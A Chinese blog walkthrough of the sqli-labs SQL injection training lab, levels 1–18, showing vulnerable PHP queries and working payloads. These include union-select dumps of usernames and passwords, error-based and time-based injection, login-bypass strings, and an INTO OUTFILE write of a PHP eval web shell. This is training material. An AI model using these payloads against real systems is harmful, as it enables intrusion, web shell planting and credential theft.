《从0到1000》sqli-labs1-75关解题记录

已于 2022-06-12 20:57:59 修改
阅读量1.2k 收藏 10
点赞数 2
分类专栏: 笔记 文章标签: php mysql 数据库
于 2021-05-17 11:43:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BaiScorpio/article/details/116923488
版权
这篇博客详细记录了作者从sqli-labs的1-75关的解题过程,涵盖了一系列SQL注入技巧,包括闭合语法、联合查询、报错注入、延时注入、宽字节注入和堆叠注入等。通过不同的注入手法,如利用order by、union select、updatexml等,逐步揭示了SQL注入的多种利用方式,同时也展示了如何利用MySQL的特性进行注入攻击。
摘要由CSDN通过智能技术生成

文章目录


项目地址: https://github.com/Audi-1/sqli-labs
题目如下图所示:
在这里插入图片描述 在这里插入图片描述

1-20关:万事开头难

Less-1

利用原理:直接拼接外部传入的id查询,并输出错误调试信息

# 单引号拼接
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

# 支持联合、报错、布尔盲注、延时盲注
if true:
    输出查询内容
else:
    print_r(mysql_error());

解题方法:
一、判断注入是否存在(黑盒视角)

在这里插入图片描述?id=1

在这里插入图片描述

?id=1’+and+‘1’='1
回显的结果与id=1时是一样的

在这里插入图片描述?id=1’+and+‘1’='2就发生了变化,由此判断注入点存在

在这里插入图片描述
二、按流程利用-也可以直接使用sqlmap

?id=1’+order+by’3’’ 利用order by 判断列数
?id=-1’+union+select+1,2,3–+ 爆出数据库数据返回的显示位置

在这里插入图片描述
这里之所以要把id=-1是因为只返回一条数据所以要把前面的数据置否,以及上面最后用到的–+或者冒号(比如这里的–+也可以换成’,因为前面的id=-1’是对WHERE id='$id’中的前半部分闭合了,现在欠缺的是后半部分的闭合)都是为了闭合后面的无关语句,让自己的语句可以执行。

一般把后面的注释掉就可以去考虑前面的闭合了。

查询某一条具体数据需要经过的路径:数据库->数据库中有哪些表->数据库中表的字段->具体的数据查询
?id=-1’+union+select+1,2,database()’

在这里插入图片描述?id=-1’+union+select+1,2,(select group_concat(table_name) from information_schema.tables where table_schema=“security”)’

在这里插入图片描述?id=-1’+union+select+1,2,(select group_concat(column_name) from information_schema.columns where table_schema=“security” and table_name=“users”)’

在这里插入图片描述?id=-1’+union+select+1,2,(select group_concat(id) from security.users )’

在这里插入图片描述

Less-2

数值型注入,流程与Less-1大体相同
输入?id=2-1是1的信息,说明此处是数值型注入

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
# 支持联合、报错、布尔盲注、延时盲注
if true:
    输出查询内容
else:
    print_r(mysql_error());

?id=-1%20union%20select%201,2,database()–+

在这里插入图片描述

Less-3

利用处为id=(‘$id’),流程与Less-1大体相同

?id=1%27)+and%20updatexml(1,concat(0x7e,(SELECT%20@@version),0x7e),1)–+

在这里插入图片描述

Less-4

# 先双引号 在括号拼接
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

# 支持联合、报错、布尔盲注、延时盲注
if true:
    输出查询内容
else:
    print_r(mysql_error());

?id=-1")%20and%20updatexml(1,concat(0x7e,(select@@version),0x7e),1)–+
在这里插入图片描述

Less-5

因为不输出查询的结果,这就导致不可以使用联合查询的注入方式

# 直接单引号拼接
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

# 支持报错、布尔盲注、延时盲注
if true:
    输出 You are in...........
else:
    print_r(mysql_error());

?id=1%27+and+updatexml(1,concat(0x7e,(select@@version),0x7e),1)–+
在这里插入图片描述

Less-6

id=“$id"和 Less-5 利用方式一致,只是闭合方式不一样,这里即不再啰嗦了。
?id=1”+and+updatexml(1,concat(0x7e,(select@@version),0x7e),1)–+
在这里插入图片描述

Less-7

# 使用单引号加双层括号拼接
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
# 支持布尔盲注、延时盲注
if true:
    输出 You are in.... Use outfile......
else:
    输出 You have an error in your SQL syntax
  //print_r(mysql_error());

?id=1’)) union select 1,2,“<?php eval($_GET['w']);?>” into outfile “C:/phpStudy/PHPTutorial/WWW/1.php” %23
在这里插入图片描述直接通过system函数执行系统命令
在这里插入图片描述

Less-8

id='$id’和 Less-7 注入方式一致,只是拼接方式不一样

?id=1’ union select 1,2,“<?php eval($_GET['w']);?>” into outfile “C:/phpStudy/PHPTutorial/WWW/1.php” %23

Less-9

从源码中可以看到 if else 都输出的是 You are in………… 这样就不能通过布尔盲注来进行注入了,只能用最慢的延时注入。

# 使用单引号拼接
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

# 支持延时盲注
if true:
    输出 You are in............
else:
    输出 You are in...........

?id=1%27%20and%20sleep(1000)–+

Less-10

和 Less-9 利用方式一样,只是拼接方式不一样,具体可以参考 Less-9

# 先使用双引号再直接拼接
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
# 支持延时盲注
if true:
    输出 You are in............
else:
    输出 You are in...........

?id=1" and sleep(1000)–+

Less-11

# POST 方式接受变量
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];

# 使用单引号拼接 SQL
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

if true:
    输出查询的信息
else:
    print_r(mysql_error());

万能密码:

# 注释掉 passwd 来登录
uname=admin'--+&passwd=&submit=Submit
uname=admin'#&passwd=&submit=Submit

# 注释后面语句 并 添加一个永真条件
uname=admin&passwd=1' or 1--+&submit=Submit
uname=admin&passwd=1'||1--+&submit=Submit
uname=admin&passwd=1' or 1#&submit=Submit
uname=admin&passwd=1'||1#&submit=Submit

# 闭合后面语句 并 添加一个永真条件
uname=admin&passwd=1'or'1'='1&submit=Submit
uname=admin&passwd=1'||'1'='1&submit=Submit

联合查询:

uname=admin&passwd=admin' order by'2'#&submit=Submit
uname=admin&passwd=-1' union select 1,(SELECT GROUP_CONCAT(username,password) FROM users)#&submit=Submit

在这里插入图片描述

报错注入:
uname=admin&passwd=1’ and updatexml(1,concat(0x7e,(select@@version),0x7e),1)#&submit=Submit
在这里插入图片描述

less-12

username=(“x”)和 Less-11 的利用方式一样,只是 SQL 拼接方式不同.
uname=admin&passwd=-1") union select 1,(SELECT GROUP_CONCAT(username,password) FROM users)#&submit=Submit
在这里插入图片描述

Less-13

# POST 方式接受变量
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];

# 使用单引号和括号来拼接 SQL
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";

if true:
    并没有输出啥信息
else:
    print_r(mysql_error())

uname=admin&passwd=-1’) and updatexml(1,concat(0x7e,(select@@version),0x7e),1)#&submit=Submit
在这里插入图片描述

Less-14

# 先使用 双引号 再直接带入 SQL 语句
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"'; 
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";

uname=admin&passwd=-1" and updatexml(1,concat(0x7e,(select@@version),0x7e),1)#&submit=Submit
在这里插入图片描述

Less-15

username=‘x’源码中注释掉了 MySQL 的报错日志,所以这里就不可以进行报错注入了,只能使用布尔盲注或者延时盲注。
uname=admin&passwd=admin’ and 1>0#&submit=Submit
在这里插入图片描述

Less-16

username=(“x”)和 Less-15 注入类型一致,更换对应的闭合方式即可。
uname=admin&passwd=admin") and 1>0#&submit=Submit
在这里插入图片描述

Less-17

# uname 参数被过滤了
$uname=check_input($_POST['uname']);  
$passwd=$_POST['passwd'];

# SELECT 语句只获取了 uname 参数 但是被过滤了 没戏
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

if select 结果正确:
    # 更新语句 使用单引号拼接 passwd
    $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";

    if mysql 报错:
            print_r(mysql_error());

从源码中可以分享唯一的注入点是在 update 语句里面,只使用了单引号拼接。因为操作正确并没有啥提示,所以不能使用联合查询注入,因为输出了报错日志,所以还可以进行报错注入,那么下面就演示一下报错注入吧:
uname=admin&passwd=admin’ and updatexml(1,concat(0x7e,(select@@version),0x7e),1)#&submit=Submit
在这里插入图片描述

Less-18

# 获取请求的 uagent 和 ip 地址
$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];

if 输入了uname 和 passwd:
    # 对这两个参数进行过滤
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);

    $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

    if SQL语句有返回结果:
        # 执行 insert 语句 这里 uagent 和 ip_address 通过单引号拼接 并且 没有过滤
        $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
            输出 $uagent;
        print_r(mysql_error());
    else:
        print_r(mysql_error());

所以这里的 IP 是无法被伪造的,这里只能通过修改 user-agent 来进行注入,考虑到 insert 语句的特殊性,这里使用闭合方式来闭合掉后面的语句,因为输出了 mysql 报错日志了,这里尝试报错注入效率会更高一点
User-Agent:1’

最低0.47元/天 解锁文章
白色的蝎子
关注
专栏目录
sqli-labs闯66~75
qq_44663230的博客
09-13 679
这是个空文档,只有两张思维导图!!! sqli-labs66~75
Sqli-labs-master超详细通教程(1-23基础篇)
m0_67391270的博客
06-12 3399
一到四主要是参数被包装的问题。一般用于尝试的语句Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23and1=2–+'and1=2–+"and1=2–+)and1=2–+')and1=2–+")and1=2–+"))and1=2–+图中显示的sql语句是我为了方便理解,修改了源代码显示出的id =1 and 1=2页面正常,考虑是否有字符注入,先加单引号可以看到提示,存在’ '包装,我们加上–+http://127.0.0.1:8080/sqli-labs-master/Less-1/?
sqli-labs(1-75)
2201_75843485的博客
02-21 963
请输入id作为数值的参数我们输入id=1判断有没有注入有注入尝试改变参数值,将参数值+1或-1,然后查看页面展示的内容是否会变化,如果页面会发生变化,我们就可以初步判断,这个id会带入数据库查询,查询后的内容会显示到页面中来。后加单引号有回显用--注释掉后面显示正常说明是字符型注入,因为该页面存在回显,所以我们可以使用。
sqli-labs靶场全解(1-75)第一
2301_76631050的博客
07-22 678
后续卡敬请期待...... Meet.meet。3.已经判断完数据库查询表有3列,那么联合查询3列,查出数据库名。把2替换为database(),比忘了id=1也要改为-1。5.联合查询通过内置库查询当前数据库使用的表中的列。4.联合查询通过内置库查询当前数据库使用的表。页面显示正常,说明存在3列。页面显示异常,说明总共3列。
SQL注入:sqli-labs靶场通(1-37
qq_68163788的博客
02-03 1万+
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
Sqli-labs1~75详解
2201_75891821的博客
07-22 543
sqli—labs通攻略
详细sqli-labs(1-65)通讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
sqli-labs Less - 62、63、64、65(sqli-labs闯指南 62、63、64、65)
m0_54899775的博客
12-30 1896
sqli-labs Less - 62、63、64、65(sqli-labs闯指南 62、63、64、65)
BUUCTF-sqli-labs1
Nothing-one的博客
07-16 1688
根据题目内容他让我们(请输入id作为带数值的参数 )这个为数字型注入。 这里面我用了sqlmap工具来进行解题。 在里面输入 python sqlmap.py -u +(网站名)(记住在网站名后面要加入?id=1) --dbs #获取数据库 这样我们就可以获得数据库中的名称了。 下面我们就要看数据库中的表明了。 python sqlmap.py -u +(网站名) -D 数据库名 --tables #列出表名 我们知道了表名,下面我们就要爆出字段名。 python sqlmap.py -u +(网站名)
sqli-labs靶场challenges第54-75(超详细)
weixin_51566481的博客
08-18 2395
sqlilabs,sql注入
sqli-labs闯练习 1
luoluopeach
03-13 355
less1 1.输入id=1,得到了ID和Password ?id=1 2.and 1=1 和 1=2都没有报错 3.加上单引号后出现报错,可能存在SQL字符注入 4.用–+将‘注释掉后回显正常,说明这里是单引号字符型注入 5.用order语句判断列数,order by 3没有报错,改为4的时候出现回显错误,说明这个表有3列 6.将id=1改为一个数据库不存在的id,用union ...
SQLi-labs 注入 54-75
感恩
09-19 378
SQLi-labs 注入 54-75
sqli-labs通攻略
jhfjdf的博客
10-13 1415
sqli-labsless 1 less 1 字符型注入,单引号 网址后面接 ?id=1 正常显示,然后判断注入点 ?id=1' and 1=1--+ 将1=1换成1=2,发现没有报错,但不显示信息,说明可以使用字符注入 之后判断列数,使用order by,从1开始逐渐递增,报错时停止。 ?id=1' order by 1--+ ...
sqli-labs注入——sqli-labs的1-65指南
qq_51366383的博客
01-27 1764
sqli-labs图片上一共有75,但是下载的资料都只有65,所以只写了65,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
sqli-labs靶场通攻略(1-75)
最新发布
shw_yzh的博客
08-14 1094
sqli-labs靶场超级细通攻略
SQL 注入:Sqli-labs (1-65通)、sqlmap、注入常用函数
freeking101的博客
07-26 4806
SQL 注入:Sqli-labs (1-65通)、sqlmap、注入常用函数
Sqli-labs全通教程(手工注入+工具使用sqlmap)
热门推荐
qq_57223070的博客
02-24 1万+
希望能帮到你,sqlmap使用及SQL注入手工
sqli-labs通
ngc2244的博客
04-26 68
通过数字值不同返回的内容也不同,所以我们输入的内容是带入到数据库里面查询了。上图如果是数字型应该是不正常反回。上图应该是不正常返回。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值